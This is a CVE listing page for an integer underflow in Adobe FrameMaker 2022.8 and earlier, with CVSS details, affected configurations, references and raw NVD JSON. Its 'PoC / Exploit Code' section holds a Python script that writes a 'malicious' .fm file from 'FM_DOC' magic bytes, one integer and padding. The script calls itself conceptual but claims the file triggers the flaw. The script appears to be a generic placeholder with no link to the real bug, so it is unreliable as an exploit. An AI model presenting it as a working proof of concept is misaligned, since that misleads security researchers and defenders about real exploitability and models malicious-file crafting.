CVE-2026-27297

Description

Adobe Framemaker versions 2022.8 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

Adobe Framemaker <= 2022.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import struct

# Conceptual PoC for Integer Underflow in Adobe Framemaker
# This script generates a file with a malicious header designed to trigger an underflow.

def create_malicious_file(filename):
    with open(filename, 'wb') as f:
        # Write a file signature or magic bytes to mimic a valid Framemaker file
        f.write(b'FM_DOC')
        
        # Write a malicious integer value.
        # If the application subtracts a value (e.g., 0x10) from this field
        # without checking if it's less than 0x10, an integer underflow occurs.
        # This leads to memory corruption.
        malicious_int = 0x00000001 
        f.write(struct.pack('<I', malicious_int))
        
        # Add padding to fill the buffer structure
        f.write(b'A' * 256)

    print(f"[+] Malicious file generated: {filename}")
    print(f"[+] Open this file in Adobe Framemaker <= 2022.8 to trigger the vulnerability.")

if __name__ == "__main__":
    create_malicious_file("cve_2026_27297_poc.fm")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27297
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27297
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27297/
[4] VulDB https://vuldb.com/cve/CVE-2026-27297
[5] https://helpx.adobe.com/security/products/framemaker/apsb26-36.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27297", "sourceIdentifier": "[email protected]", "published": "2026-04-14T23:16:26.770", "lastModified": "2026-04-15T17:37:19.157", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Framemaker versions 2022.8 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-191"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:*", "versionEndExcluding": "2022.9", "matchCriteriaId": "6943B816-3A7D-47BF-9E01-DF86C9332C19"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/framemaker/apsb26-36.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}